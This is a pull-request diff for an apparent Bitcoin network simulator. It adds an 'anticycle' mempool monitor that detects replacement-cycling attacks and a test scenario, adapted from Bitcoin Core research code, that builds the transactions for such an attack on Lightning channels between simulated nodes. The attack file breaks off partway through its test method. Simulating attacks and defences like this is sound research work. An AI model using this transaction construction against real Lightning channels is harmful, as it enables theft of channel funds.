### PR TITLE
add anticycle

### DIFF
--- a/requirements.in
+++ b/requirements.in
@@ -12,3 +12,4 @@ requests<2.30
 rich
 tabulate
 PyYAML
+pyzmq

--- a/requirements.txt
+++ b/requirements.txt
@@ -15,11 +15,17 @@ certifi==2023.11.17
 charset-normalizer==3.3.2
     # via requests
 click==8.1.7
-    # via flask
+    # via
+    #   -r requirements.in
+    #   flask
 docker==7.0.0
+    # via -r requirements.in
 flask==3.0.0
-    # via flask-jsonrpc
+    # via
+    #   -r requirements.in
+    #   flask-jsonrpc
 flask-jsonrpc==1.1.0
+    # via -r requirements.in
 google-auth==2.25.2
     # via kubernetes
 idna==3.6
@@ -29,12 +35,17 @@ itsdangerous==2.1.2
 jinja2==3.1.2
     # via flask
 jsonrpcclient==4.0.3
+    # via -r requirements.in
 jsonrpcserver==5.0.9
+    # via -r requirements.in
 jsonschema==4.20.0
-    # via jsonrpcserver
+    # via
+    #   -r requirements.in
+    #   jsonrpcserver
 jsonschema-specifications==2023.12.1
     # via jsonschema
 kubernetes==28.1.0
+    # via -r requirements.in
 markdown-it-py==3.0.0
     # via rich
 markupsafe==2.1.3
@@ -44,7 +55,9 @@ markupsafe==2.1.3
 mdurl==0.1.2
     # via markdown-it-py
 networkx==3.2.1
+    # via -r requirements.in
 numpy==1.26.2
+    # via -r requirements.in
 oauthlib==3.2.2
     # via
     #   kubernetes
@@ -64,19 +77,25 @@ pygments==2.17.2
 python-dateutil==2.8.2
     # via kubernetes
 pyyaml==6.0.1
-    # via kubernetes
+    # via
+    #   -r requirements.in
+    #   kubernetes
+pyzmq==25.1.2
+    # via -r requirements.in
 referencing==0.32.0
     # via
     #   jsonschema
     #   jsonschema-specifications
 requests==2.29.0
     # via
+    #   -r requirements.in
     #   docker
     #   kubernetes
     #   requests-oauthlib
 requests-oauthlib==1.3.1
     # via kubernetes
 rich==13.7.0
+    # via -r requirements.in
 rpds-py==0.16.2
     # via
     #   jsonschema
@@ -88,6 +107,7 @@ six==1.16.0
     #   kubernetes
     #   python-dateutil
 tabulate==0.9.0
+    # via -r requirements.in
 typeguard==2.13.3
     # via flask-jsonrpc
 typing-extensions==4.9.0
@@ -101,4 +121,3 @@ websocket-client==1.7.0
     # via kubernetes
 werkzeug==3.0.1
     # via flask
-

--- a/src/backend/kubernetes_backend.py
+++ b/src/backend/kubernetes_backend.py
@@ -612,6 +612,9 @@ class KubernetesBackend:
                         port=tank.zmqtxport, target_port=tank.zmqtxport, name="zmqtx"
                     ),
                     client.V1ServicePort(
+                        port=tank.zmqpubsequenceport, target_port=tank.zmqpubsequenceport, name="zmqpubsequence"
+                    ),
+                    client.V1ServicePort(
                         port=PROMETHEUS_METRICS_PORT,
                         target_port=PROMETHEUS_METRICS_PORT,
                         name="prometheus-metrics",

--- a/src/scenarios/anticycle.py
+++ b/src/scenarios/anticycle.py
@@ -41,9 +41,8 @@ def run_anticycle(node: TestNode, logging):
     socket = context.socket(zmq.SUB)
 
     # Connect to the publisher's socket
-    external, internal = get_service_ip("warnet-tank-000000-service")
     port = "28334"  # specify the port you want to listen on
-    socket.connect(f"tcp://{external}:{port}")
+    socket.connect(f"tcp://warnet-tank-000000-service:{port}")
 
     # Subscribe to all messages
     # You can specify a prefix filter here to receive specific messages

--- a/src/scenarios/anticycle.py
+++ b/src/scenarios/anticycle.py
@@ -33,17 +33,17 @@ def run_anticycle(node: TestNode, logging):
     context = zmq.Context()
 
     # Create a socket of type SUBSCRIBE
-    socket = context.socket(zmq.SUB)
+    zmq_socket = context.socket(zmq.SUB)
 
     # Connect to the publisher's socket
-    port = "28334"  # specify the port you want to listen on
-    socket.connect(f"tcp://warnet-tank-000000-service:{port}")
+    zmq_port = "28334"
+    zmq_socket.connect(f"tcp://warnet-tank-000000-service:{zmq_port}")
 
     # Subscribe to all messages
     # You can specify a prefix filter here to receive specific messages
-    socket.setsockopt_string(zmq.SUBSCRIBE, '')
+    zmq_socket.setsockopt_string(zmq.SUBSCRIBE, '')
 
-    logging.info(f" - anticycle - Listening for messages on port {port}...")
+    logging.info(f" - anticycle - Listening for messages on port {zmq_port}...")
 
     # txid -> serialized_tx
     # Cache for full transactions of which we believe are being replacement cycled.
@@ -96,7 +96,7 @@ def run_anticycle(node: TestNode, logging):
     try:
         while True:
             # Receive a message
-            topic, body, sequence = socket.recv_multipart()
+            topic, body, sequence = zmq_socket.recv_multipart()
             received_seq = struct.unpack('<I', sequence)[-1]
             txid = body[:32].hex()
             label = chr(body[32])
@@ -242,7 +242,7 @@ def run_anticycle(node: TestNode, logging):
         logging.info(" - anticycle - Program interrupted by user")
     finally:
         # Clean up on exit
-        socket.close()
+        zmq_socket.close()
         context.term()
 
 

--- a/src/scenarios/anticycle.py
+++ b/src/scenarios/anticycle.py
@@ -1,25 +1,17 @@
 # Original: https://github.com/instagibbs/anticycle/blob/b5db30ec887ab0bc666bf0a94ff5b1fc17404ba8/anticycle.py#L1
 from decimal import Decimal
 from collections import defaultdict
-import json
-import logging
-import os
-import requests
-from requests.auth import HTTPBasicAuth
 import struct
-import sys
 import zmq
 
 from test_framework.test_node import TestNode
 from warnet.test_framework_bridge import WarnetTestFramework
 
-from test_framework.authproxy import JSONRPCException
-
 num_MB = 40
 
 # How many times a utxo has to go from Top->Bottom to be
 # have its spending tx cached(if otherwise empty)
-# Increasing this value reducs false positive rates
+# Increasing this value reduces false positive rates
 # and reduces memory usage accordingly.
 CYCLE_THRESH = 1
 

--- a/src/scenarios/anticycle.py
+++ b/src/scenarios/anticycle.py
@@ -1,0 +1,256 @@
+# Original: https://github.com/instagibbs/anticycle/blob/b5db30ec887ab0bc666bf0a94ff5b1fc17404ba8/anticycle.py#L1
+from decimal import Decimal
+from collections import defaultdict
+import json
+import logging
+import os
+import requests
+from requests.auth import HTTPBasicAuth
+import struct
+import sys
+import zmq
+
+from test_framework.test_node import TestNode
+from warnet.test_framework_bridge import WarnetTestFramework
+
+from test_framework.authproxy import JSONRPCException
+
+num_MB = 40
+
+# How many times a utxo has to go from Top->Bottom to be
+# have its spending tx cached(if otherwise empty)
+# Increasing this value reducs false positive rates
+# and reduces memory usage accordingly.
+CYCLE_THRESH = 1
+
+
+def cli_help():
+    return "Run an anti-cycling defense - based on instagibbs' work"
+
+
+def run_anticycle(node: TestNode, logging):
+    '''
+    Best effort mempool syncing to detect replacement cycling attacks
+    '''
+
+    logging.info(" - anticycle - Starting anticycle")
+
+    context = zmq.Context()
+
+    # Create a socket of type SUBSCRIBE
+    socket = context.socket(zmq.SUB)
+
+    # Connect to the publisher's socket
+    external, internal = get_service_ip("warnet-tank-000000-service")
+    port = "28334"  # specify the port you want to listen on
+    socket.connect(f"tcp://{external}:{port}")
+
+    # Subscribe to all messages
+    # You can specify a prefix filter here to receive specific messages
+    socket.setsockopt_string(zmq.SUBSCRIBE, '')
+
+    logging.info(f" - anticycle - Listening for messages on port {port}...")
+
+    # txid -> serialized_tx
+    # Cache for full transactions of which
+    # we believe are being replacement cycled.
+    cycled_tx_cache = {}
+    cycled_tx_cache_size = 0
+
+    # utxo
+    # The complete set of inputs that are spent
+    # by protected transactions. This ensures
+    # that every cached tx in cycled_tx_cache
+    # can be independently spent, costing the attacker
+    # a full "top block" slot each on inclusion.
+    cycled_input_set = set([])
+
+    # txid -> serialize_tx
+    # This cache is for everything above "top block"
+    # that we hear about. This cache is required only
+    # because the R(emove) notification stream doesn't
+    # give full transactions. We need them to compute
+    # top->bottom utxo changes.
+    dummy_cache = {}
+    dummy_cache_size = 0
+
+    # utxo -> int
+    # How many times in this epoch has the specific utxo
+    # gone from next block to non-next block?
+    utxo_cycled_count = defaultdict(int)
+
+    # utxo -> txid
+    # Assign txids of protected transactions to utxos that
+    # appear to be replacement cycled. The full tx is
+    # fetched from cycled_tx_cache.
+    utxo_cache = {}
+
+    # Simple anti-DoS max
+    tx_cache_max_byte_size = num_MB * 1000 * 1000
+
+    # These are populated by "R" events and cleared in
+    # subsequent "A" events. These are to track
+    # top->bottom transitions
+    # utxo -> removed tx's txid
+    utxos_being_doublespent = {}
+
+    logging.info("Getting Top Block fee")
+
+    # If we can't estimate blocks in a scenario, we just
+    # assume anything we see can be mined.
+    # Fix this post-cluster mempool with "next block"
+    # chunk feerate checks.
+    MINRATE = 0.00001000
+
+
+    # "Top block" is considered next three blocks
+    try:
+        topblock_rate_btc_kvb = node.estimatesmartfee(3)["feerate"]
+    except KeyError:
+        topblock_rate_btc_kvb = MINRATE
+
+    try:
+        while True:
+            # Receive a message
+            topic, body, sequence = socket.recv_multipart()
+            received_seq = struct.unpack('<I', sequence)[-1]
+            txid = body[:32].hex()
+            label = chr(body[32])
+
+            if received_seq % 100 == 0:
+                logging.info(
+                    f" - anticycle - Transactions cached: {len(cycled_tx_cache)}, bytes cached: {cycled_tx_cache_size / 1000000}/{num_MB}MB, topblock rate: {topblock_rate_btc_kvb}")
+                logging.info(f" - anticycle - Dummy cache: {len(dummy_cache)}, {dummy_cache_size / 1000000}/{num_MB}MB")
+
+            if label == "A":
+                logging.info(f" - anticycle - Tx {txid} added")
+                entry = node.getmempoolentry(txid)
+                if entry is None:
+                    logging.info(f" - anticycle - {txid} mempool entry not found in when fetched")
+                    utxos_being_doublespent.clear()
+                    continue
+                # We are allowing "packages" of ancestors.
+                # What we really want is the mempool entry's chunk feerate.
+                # And we actually don't want to track in-mempool utxos, only
+                # confirmed.
+                tx_rate_btc_kvb = Decimal(entry['fees']['ancestor']) / entry['ancestorsize'] * 1000
+                new_top_block = tx_rate_btc_kvb >= topblock_rate_btc_kvb
+                if new_top_block:
+                    logging.info(f" - anticycle - Transaction top block {txid}")
+                    raw_tx = node.getrawtransaction(txid, True)
+                    # Might have already been evicted/mined/etc
+                    if raw_tx is None:
+                        logging.info(f" - anticycle - {txid} not found in mempool when fetched")
+                        utxos_being_doublespent.clear()
+                        continue
+
+                    logging.info(f" - anticycle - Transaction dummy cached {txid}")
+                    # Cache tx to make sure we see it when it's being removed later
+                    # FIXME get a better notification stream
+                    dummy_cache[txid] = raw_tx
+                    dummy_cache_size += len(raw_tx["hex"]) / 2
+
+                    add_tx_prevouts = [(tx_input['txid'], tx_input['vout']) for tx_input in raw_tx["vin"]]
+                    logging.info(f" - anticycle - prevouts being spent by new tx: {add_tx_prevouts}")
+
+                    logging.info(f" - anticycle - prevouts from removed transactions: {utxos_being_doublespent}")
+
+                    for prevout in add_tx_prevouts:
+                        if prevout not in utxos_being_doublespent:
+                            logging.info(f" - anticycle - {prevout} went from unspent to spent")
+                            # Bottom->Top, clear cached transaction if any
+                            if prevout in utxo_cache:
+                                logging.info(f"Deleting cache entry for {(tx_input['txid'], tx_input['vout'])}")
+                                cycled_tx_cache_size -= len(cycled_tx_cache[utxo_cache[prevout]])
+                                del cycled_tx_cache[utxo_cache[prevout]]
+                                del utxo_cache[prevout]
+                        else:
+                            logging.info(f" - anticycle - {prevout} went from spent to spent")
+                            # Top->Top, cache if entry is empty
+                            if prevout not in utxo_cache and utxo_cycled_count[prevout] >= CYCLE_THRESH:
+                                # Get replaced txid and full tx from dummy_cache
+                                removed_txid = utxos_being_doublespent[prevout]
+                                removed_tx = dummy_cache[removed_txid]
+                                removed_prevouts = [(tx_input['txid'], tx_input['vout']) for tx_input in raw_tx["vin"]]
+                                can_cache = all(prevout not in cycled_input_set for prevout in removed_prevouts)
+                                if can_cache:
+                                    logging.info(f"{prevout} has been RBF'd, caching {removed_txid}")
+                                    utxo_cache[prevout] = removed_txid
+                                    cycled_tx_cache[removed_txid] = removed_tx
+                                    cycled_tx_cache_size += len(cycled_tx_cache[utxo_cache[prevout]]["hex"]) / 2
+                                    for removed_prevout in removed_prevouts:
+                                        cycled_input_set.add(removed_prevout)
+                                else:
+                                    logging.info(f"{removed_txid} is not being cached due to conflicts in input cache")
+                            del utxos_being_doublespent[prevout]  # delete to detect remaining Top->Bottom later
+
+                    # Handle Top->Bottom: There are top block spends now unspent!
+                    if len(utxos_being_doublespent) > 0:
+                        logging.info(f" - anticycle - {len(utxos_being_doublespent)} utxos going spent to unspent")
+                        # things were double-spent and not removed with top block
+                        for unspent_prevout, _ in utxos_being_doublespent.items():
+                            # Count it first
+                            utxo_cycled_count[unspent_prevout] += 1
+                            logging.info(
+                                f"{unspent_prevout} has been cycled {utxo_cycled_count[unspent_prevout]} times")
+
+                            # If we have something cached, it might be free to re-enter now
+                            if unspent_prevout in utxo_cache and utxo_cache[unspent_prevout] in cycled_tx_cache:
+                                raw_tx = cycled_tx_cache[utxo_cache[unspent_prevout]]["hex"]
+                                send_ret = node.sendrawtransaction(raw_tx)
+                                if send_ret:
+                                    logging.info(f" - anticycle - Successfully resubmitted {send_ret}")
+                                    logging.info(f" - anticycle - rawhex: {raw_tx}")
+
+                # We processed the double-spends, clear
+                utxos_being_doublespent.clear()
+
+            elif label == "R":
+                logging.info(f" - anticycle - Tx {txid} removed")
+                # This tx is removed, perhaps replaced, next "A" message should be the tx replacing it(conflict_tx)
+
+                # If this tx is in the tx_cache, that implies it was top block
+                # we need to see which utxos being non-top block once we see
+                # the next "A"
+                # N.B. I am not sure at all the next "A" is actually a double-spend, that should be checked!
+                # I'm going off of functional tests.
+                if txid in dummy_cache:
+                    for tx_input in dummy_cache[txid]["vin"]:
+                        utxos_being_doublespent[(tx_input["txid"], tx_input["vout"])] = txid
+
+            elif label == "C" or label == "D":
+                #logging.info(f"Block tip changed")
+                # FIXME do something smarter, for now we just hope this isn't hit on short timeframes
+                # Defender will have to resubmit enough again to be protected for the new period
+                if cycled_tx_cache_size > tx_cache_max_byte_size or dummy_cache_size >= tx_cache_max_byte_size:
+                    logging.info(f"wiping state")
+                    dummy_cache.clear()
+                    dummy_cache_size = 0
+                    utxo_cache.clear()
+                    utxo_cycled_count.clear()
+                    utxos_being_doublespent.clear()
+                    cycled_tx_cache.clear()
+                    cycled_tx_cache_size = 0
+                try:
+                    topblock_rate_btc_kvb = node.estimatesmartfee(3)["feerate"]
+                except KeyError:
+                    topblock_rate_btc_kvb = MINRATE
+    except KeyboardInterrupt:
+        logging.info(" - anticycle - Program interrupted by user")
+    finally:
+        # Clean up on exit
+        socket.close()
+        context.term()
+
+
+class AnticycleTest(WarnetTestFramework):
+
+    def set_test_params(self):
+        self.num_nodes = 2
+
+    def run_test(self):
+        run_anticycle(self.nodes[0],  self.log)
+
+
+if __name__ == '__main__':
+    AnticycleTest().main()

--- a/src/scenarios/anticycle.py
+++ b/src/scenarios/anticycle.py
@@ -73,7 +73,7 @@ def run_anticycle(node: TestNode, logging):
     utxo_cache = {}
 
     # Simple anti-DoS max
-    tx_cache_max_byte_size = num_MB * 1000 * 1000
+    tx_cache_max_byte_size = num_MB * 1_000 * 1_000
 
     # These are populated by "R" events and cleared in subsequent "A" events. These are to track
     # top->bottom transitions
@@ -85,7 +85,7 @@ def run_anticycle(node: TestNode, logging):
     # If we can't estimate blocks in a scenario, we just assume anything we see can be mined.
     # Fix this post-cluster mempool with "next block"
     # chunk feerate checks.
-    minrate: float = 0.00001000
+    minrate: float = 0.000_010_00
 
     # "Top block" is considered next three blocks
     try:

--- a/src/scenarios/anticycle.py
+++ b/src/scenarios/anticycle.py
@@ -46,52 +46,43 @@ def run_anticycle(node: TestNode, logging):
     logging.info(f" - anticycle - Listening for messages on port {port}...")
 
     # txid -> serialized_tx
-    # Cache for full transactions of which
-    # we believe are being replacement cycled.
+    # Cache for full transactions of which we believe are being replacement cycled.
     cycled_tx_cache = {}
     cycled_tx_cache_size = 0
 
     # utxo
-    # The complete set of inputs that are spent
-    # by protected transactions. This ensures
-    # that every cached tx in cycled_tx_cache
-    # can be independently spent, costing the attacker
-    # a full "top block" slot each on inclusion.
+    # The complete set of inputs that are spent by protected transactions.
+    # This ensures that every cached tx in `cycled_tx_cache` can be independently spent, costing the
+    # attacker a full "top block" slot each on inclusion.
     cycled_input_set = set([])
 
     # txid -> serialize_tx
-    # This cache is for everything above "top block"
-    # that we hear about. This cache is required only
-    # because the R (Remove) notification stream doesn't
-    # give full transactions. We need them to compute
-    # top->bottom utxo changes.
+    # This cache is for everything above "top block" that we hear about. This cache is required only
+    # because the R (Remove) notification stream doesn't give full transactions. We need them to
+    # compute top->bottom utxo changes.
     dummy_cache = {}
     dummy_cache_size = 0
 
     # utxo -> int
-    # How many times in this epoch has the specific utxo
-    # gone from next block to non-next block?
+    # How many times in this epoch has the specific utxo gone from next block to non-next block?
     utxo_cycled_count = defaultdict(int)
 
     # utxo -> txid
-    # Assign txids of protected transactions to utxos that
-    # appear to be replacement cycled. The full tx is
-    # fetched from cycled_tx_cache.
+    # Assign txids of protected transactions to utxos that appear to be replacement cycled. The full
+    # tx is fetched from cycled_tx_cache.
     utxo_cache = {}
 
     # Simple anti-DoS max
     tx_cache_max_byte_size = num_MB * 1000 * 1000
 
-    # These are populated by "R" events and cleared in
-    # subsequent "A" events. These are to track
+    # These are populated by "R" events and cleared in subsequent "A" events. These are to track
     # top->bottom transitions
     # utxo -> removed tx's txid
     utxos_being_doublespent = {}
 
     logging.info("Getting Top Block fee")
 
-    # If we can't estimate blocks in a scenario, we just
-    # assume anything we see can be mined.
+    # If we can't estimate blocks in a scenario, we just assume anything we see can be mined.
     # Fix this post-cluster mempool with "next block"
     # chunk feerate checks.
     minrate: float = 0.00001000
@@ -127,8 +118,7 @@ def run_anticycle(node: TestNode, logging):
                     continue
                 # We are allowing "packages" of ancestors.
                 # What we really want is the mempool entry's chunk feerate.
-                # And we actually don't want to track in-mempool utxos, only
-                # confirmed.
+                # And we actually don't want to track in-mempool utxos, only confirmed.
                 tx_rate_btc_kvb = Decimal(entry['fees']['ancestor']) / entry['ancestorsize'] * 1000
                 new_top_block = tx_rate_btc_kvb >= topblock_rate_btc_kvb
                 if new_top_block:
@@ -150,7 +140,6 @@ def run_anticycle(node: TestNode, logging):
                                        for tx_input in raw_tx["vin"]]
                     logging.info(f" - anticycle - prevouts being spent by new tx: "
                                  f"{add_tx_prevouts}")
-
                     logging.info(f" - anticycle - prevouts from removed transactions: "
                                  f"{utxos_being_doublespent}")
 
@@ -219,11 +208,10 @@ def run_anticycle(node: TestNode, logging):
             elif label == "R":
                 logging.info(f" - anticycle - Tx {txid} removed")
                 # This tx is removed, perhaps replaced, next "A" message should be the tx replacing
-                # it(conflict_tx)
+                # it (conflict_tx)
 
-                # If this tx is in the tx_cache, that implies it was top block
-                # we need to see which utxos being non-top block once we see
-                # the next "A"
+                # If this tx is in the tx_cache, that implies it was top block we need to see which
+                # utxos being non-top block once we see the next "A"
                 # N.B. I am not sure at all the next "A" is actually a double-spend, that should be
                 # checked!
                 # I'm going off of functional tests.

--- a/src/scenarios/replacement_cycling.py
+++ b/src/scenarios/replacement_cycling.py
@@ -1,0 +1,564 @@
+#!/usr/bin/env python3
+# Copyright (c) 2023 The Bitcoin Core developers
+# Distributed under the MIT software license, see the accompanying
+# file COPYING or http://www.opensource.org/licenses/mit-license.php.
+#
+# Original: https://github.com/ariard/bitcoin/blob/30f5d5b270e4ff195e8dcb9ef6b7ddcc5f6a1bf2/test/functional/mempool_replacement_cycling.py#L5    # noqa
+
+
+"""Test replacement cycling attacks against Lightning channels"""
+
+from test_framework.key import (
+    ECKey
+)
+
+from test_framework.messages import (
+    CTransaction,
+    CTxIn,
+    CTxInWitness,
+    CTxOut,
+    COutPoint,
+    sha256,
+    COIN,
+)
+
+from test_framework.util import (
+    assert_equal
+)
+
+from test_framework.script import (
+    CScript,
+    hash160,
+    OP_HASH160,
+    OP_EQUAL,
+    OP_ELSE,
+    OP_ENDIF,
+    OP_CHECKSIG,
+    OP_SWAP,
+    OP_SIZE,
+    OP_NOTIF,
+    OP_DROP,
+    OP_CHECKMULTISIG,
+    OP_EQUALVERIFY,
+    OP_0,
+    OP_2,
+    OP_TRUE,
+    SegwitV0SignatureHash,
+    SIGHASH_ALL,
+)
+
+from warnet.test_framework_bridge import WarnetTestFramework
+
+from test_framework.wallet import MiniWallet
+
+
+def cli_help():
+    return "Run a replacement cycling attack - based on ariard's work"
+
+
+def get_funding_redeemscript(funder_pubkey, fundee_pubkey):
+    return CScript(
+        [OP_2, funder_pubkey.get_bytes(), fundee_pubkey.get_bytes(), OP_2, OP_CHECKMULTISIG])
+
+
+def get_anchor_single_key_redeemscript(pubkey):
+    return CScript([pubkey.get_bytes(), OP_CHECKSIG])
+
+
+def generate_funding_chan(wallet, coin, funder_pubkey, fundee_pubkey) -> CTransaction:
+    witness_script = get_funding_redeemscript(funder_pubkey, fundee_pubkey)
+    witness_program = sha256(witness_script)
+    script_pubkey = CScript([OP_0, witness_program])
+
+    funding_tx = CTransaction()
+    funding_tx.vin.append(CTxIn(COutPoint(int(coin['txid'], 16), coin['vout']), b""))
+    funding_tx.vout.append(CTxOut(int(49.99998 * COIN), script_pubkey))
+    funding_tx.rehash()
+
+    wallet.sign_tx(funding_tx)
+    return funding_tx
+
+
+def generate_parent_child_tx(wallet, coin, sat_per_vbyte):
+    # We build a junk parent transaction for the second-stage HTLC-preimage
+    junk_parent_fee = 158 * sat_per_vbyte
+
+    junk_script = CScript([OP_TRUE])
+    junk_scriptpubkey = CScript([OP_0, sha256(junk_script)])
+
+    junk_parent = CTransaction()
+    junk_parent.vin.append(CTxIn(COutPoint(int(coin['txid'], 16), coin['vout']), b""))
+    junk_parent.vout.append(CTxOut(int(49.99998 * COIN - junk_parent_fee), junk_scriptpubkey))
+
+    wallet.sign_tx(junk_parent)
+    junk_parent.rehash()
+
+    child_tx_fee = 158 * sat_per_vbyte
+
+    child_tx = CTransaction()
+    child_tx.vin.append(CTxIn(COutPoint(int(junk_parent.hash, 16), 0), b"", 0))
+    child_tx.vout.append(
+        CTxOut(int(49.99998 * COIN - (junk_parent_fee + child_tx_fee)), junk_scriptpubkey))
+
+    child_tx.wit.vtxinwit.append(CTxInWitness())
+    child_tx.wit.vtxinwit[0].scriptWitness.stack = [junk_script]
+    child_tx.rehash()
+
+    return junk_parent, child_tx
+
+
+def generate_preimage_tx(input_amount, sat_per_vbyte, funder_seckey, fundee_seckey, hashlock,
+                         commitment_tx, preimage_parent_tx):
+    commitment_fee = 158 * 2  # Old sat per vbyte
+
+    witness_script = CScript([fundee_seckey.get_pubkey().get_bytes(), OP_SWAP, OP_SIZE, 32,
+                              OP_EQUAL, OP_NOTIF, OP_DROP, 2, OP_SWAP,
+                              funder_seckey.get_pubkey().get_bytes(), 2, OP_CHECKMULTISIG, OP_ELSE,
+                              OP_HASH160, hashlock, OP_EQUALVERIFY, OP_CHECKSIG, OP_ENDIF])
+
+    spend_script = CScript([OP_TRUE])
+    spend_scriptpubkey = CScript([OP_0, sha256(spend_script)])
+
+    preimage_fee = 148 * sat_per_vbyte
+    receiver_preimage = CTransaction()
+    receiver_preimage.vin.append(CTxIn(COutPoint(int(commitment_tx.hash, 16), 0), b"", 0))
+    receiver_preimage.vin.append(CTxIn(COutPoint(int(preimage_parent_tx.hash, 16), 0), b"", 0))
+    receiver_preimage.vout.append(
+        CTxOut(int(2 * input_amount - (commitment_fee + preimage_fee * 3)), spend_scriptpubkey))
+
+    sig_hash = SegwitV0SignatureHash(witness_script, receiver_preimage, 0, SIGHASH_ALL,
+                                     commitment_tx.vout[0].nValue)
+    fundee_sig = fundee_seckey.sign_ecdsa(sig_hash) + b'\x01'
+
+    # Spend the commitment transaction HTLC output
+    receiver_preimage.wit.vtxinwit.append(CTxInWitness())
+    receiver_preimage.wit.vtxinwit[0].scriptWitness.stack = [fundee_sig, b'a' * 32, witness_script]
+
+    # Spend the parent transaction OP_TRUE output
+    junk_script = CScript([OP_TRUE])
+    receiver_preimage.wit.vtxinwit.append(CTxInWitness())
+    receiver_preimage.wit.vtxinwit[1].scriptWitness.stack = [junk_script]
+    receiver_preimage.rehash()
+
+    return receiver_preimage
+
+
+def create_chan_state(funding_txid, funding_vout, funder_seckey, fundee_seckey, input_amount,
+                      input_script, sat_per_vbyte, timelock, hashlock, nsequence,
+                      preimage_parent_tx):
+    witness_script = CScript([fundee_seckey.get_pubkey().get_bytes(), OP_SWAP, OP_SIZE, 32,
+                              OP_EQUAL, OP_NOTIF, OP_DROP, 2, OP_SWAP,
+                              funder_seckey.get_pubkey().get_bytes(), 2, OP_CHECKMULTISIG, OP_ELSE,
+                              OP_HASH160, hashlock, OP_EQUALVERIFY, OP_CHECKSIG, OP_ENDIF])
+    witness_program = sha256(witness_script)
+    script_pubkey = CScript([OP_0, witness_program])
+
+    # Expected size = 158 vbyte
+    commitment_fee = 158 * sat_per_vbyte
+    commitment_tx = CTransaction()
+    commitment_tx.vin.append(CTxIn(COutPoint(int(funding_txid, 16), funding_vout), b"", 0x1))
+    commitment_tx.vout.append(CTxOut(int(input_amount - 158 * sat_per_vbyte), script_pubkey))
+
+    sig_hash = SegwitV0SignatureHash(input_script, commitment_tx, 0, SIGHASH_ALL, int(input_amount))
+    funder_sig = funder_seckey.sign_ecdsa(sig_hash) + b'\x01'
+    fundee_sig = fundee_seckey.sign_ecdsa(sig_hash) + b'\x01'
+
+    commitment_tx.wit.vtxinwit.append(CTxInWitness())
+    commitment_tx.wit.vtxinwit[0].scriptWitness.stack = [b'', funder_sig, fundee_sig, input_script]
+    commitment_tx.rehash()
+
+    spend_script = CScript([OP_TRUE])
+    spend_scriptpubkey = CScript([OP_0, sha256(spend_script)])
+
+    timeout_fee = 158 * sat_per_vbyte
+    offerer_timeout = CTransaction()
+    offerer_timeout.vin.append(CTxIn(COutPoint(int(commitment_tx.hash, 16), 0), b"", nsequence))
+    offerer_timeout.vout.append(CTxOut(int(input_amount - (commitment_fee + timeout_fee)),
+                                       spend_scriptpubkey))
+    offerer_timeout.nLockTime = timelock
+
+    sig_hash = SegwitV0SignatureHash(witness_script, offerer_timeout, 0, SIGHASH_ALL,
+                                     commitment_tx.vout[0].nValue)
+    funder_sig = funder_seckey.sign_ecdsa(sig_hash) + b'\x01'
+    fundee_sig = fundee_seckey.sign_ecdsa(sig_hash) + b'\x01'
+
+    offerer_timeout.wit.vtxinwit.append(CTxInWitness())
+    offerer_timeout.wit.vtxinwit[0].scriptWitness.stack = [b'', fundee_sig, funder_sig, b'',
+                                                           witness_script]
+    offerer_timeout.rehash()
+
+    preimage_fee = 148 * sat_per_vbyte
+    receiver_preimage = CTransaction()
+    receiver_preimage.vin.append(CTxIn(COutPoint(int(commitment_tx.hash, 16), 0), b"", 0))
+    receiver_preimage.vin.append(CTxIn(COutPoint(int(preimage_parent_tx.hash, 16), 0), b"", 0))
+    receiver_preimage.vout.append(
+        CTxOut(int(2 * input_amount - (commitment_fee + preimage_fee * 3)), spend_scriptpubkey))
+
+    sig_hash = SegwitV0SignatureHash(witness_script, receiver_preimage, 0, SIGHASH_ALL,
+                                     commitment_tx.vout[0].nValue)
+    fundee_sig = fundee_seckey.sign_ecdsa(sig_hash) + b'\x01'
+
+    # Spend the commitment transaction HTLC output
+    receiver_preimage.wit.vtxinwit.append(CTxInWitness())
+    receiver_preimage.wit.vtxinwit[0].scriptWitness.stack = [fundee_sig, b'a' * 32, witness_script]
+
+    # Spend the parent transaction OP_TRUE output
+    junk_script = CScript([OP_TRUE])
+    receiver_preimage.wit.vtxinwit.append(CTxInWitness())
+    receiver_preimage.wit.vtxinwit[1].scriptWitness.stack = [junk_script]
+    receiver_preimage.rehash()
+
+    return commitment_tx, offerer_timeout, receiver_preimage
+
+
+class ReplacementCyclingTest(WarnetTestFramework):
+
+    def set_test_params(self):
+        self.num_nodes = 2
+
+    def test_replacement_cycling(self):
+        alice = self.nodes[0]
+        alice_seckey = ECKey()
+        alice_seckey.generate(True)
+
+        bob = self.nodes[1]
+        bob_seckey = ECKey()
+        bob_seckey.generate(True)
+
+        self.generate(alice, 501)
+
+        self.sync_all()
+        last_blockhash = alice.getbestblockhash()
+        block = alice.getblock(last_blockhash)
+        last_blockheight = block['height']
+
+        self.connect_nodes(0, 1)
+
+        coin_1 = self.wallet.get_utxo()
+
+        wallet = self.wallet
+
+        # Generate funding transaction opening channel between Alice and Bob.
+        ab_funding_tx = generate_funding_chan(wallet, coin_1, alice_seckey.get_pubkey(),
+                                              bob_seckey.get_pubkey())
+
+        self.log.info(f"@{last_blockheight} {ab_funding_tx.hash[0:7]} Funding Txn "
+                      f"- Funded by: [{coin_1['txid'][0:7]} Coin 1]")
+        alice.log.info(f"@{last_blockheight} {ab_funding_tx.hash[0:7]} Funding Txn "
+                       "- Signed by: Alice & Bob "
+                       "- Alice/Bob 2/2 multisig")
+
+        # Propagate and confirm funding transaction.
+        ab_funding_txid = alice.sendrawtransaction(hexstring=ab_funding_tx.serialize().hex(),
+                                                   maxfeerate=0)
+        alice.log.info(f"@{last_blockheight} {ab_funding_tx.hash[0:7]} Funding Txn "
+                       "- Broadcasted by: Alice")
+
+        self.sync_all()
+
+        assert ab_funding_txid in alice.getrawmempool()
+        assert ab_funding_txid in bob.getrawmempool()
+        alice.log.info(f"@{last_blockheight} {ab_funding_txid[0:7]} Funding Txn "
+                       "- Seen in the mempool")
+
+        # We mine one block the Alice - Bob channel is opened.
+        self.generate(alice, 1)
+        assert_equal(len(alice.getrawmempool()), 0)
+        assert_equal(len(bob.getrawmempool()), 0)
+
+        last_blockhash = alice.getbestblockhash()
+        block = alice.getblock(last_blockhash)
+        last_blockheight = block['height']
+
+        self.log.info(f"@{last_blockheight} {ab_funding_txid[0:7]} Funding Txn - Mined")
+
+        funding_redeemscript = get_funding_redeemscript(alice_seckey.get_pubkey(),
+                                                        bob_seckey.get_pubkey())
+
+        coin_2 = self.wallet.get_utxo()
+
+        parent_seckey = ECKey()
+        parent_seckey.generate(True)
+
+        (bob_parent_tx, bob_child_tx) = generate_parent_child_tx(wallet, coin_2, 1)
+
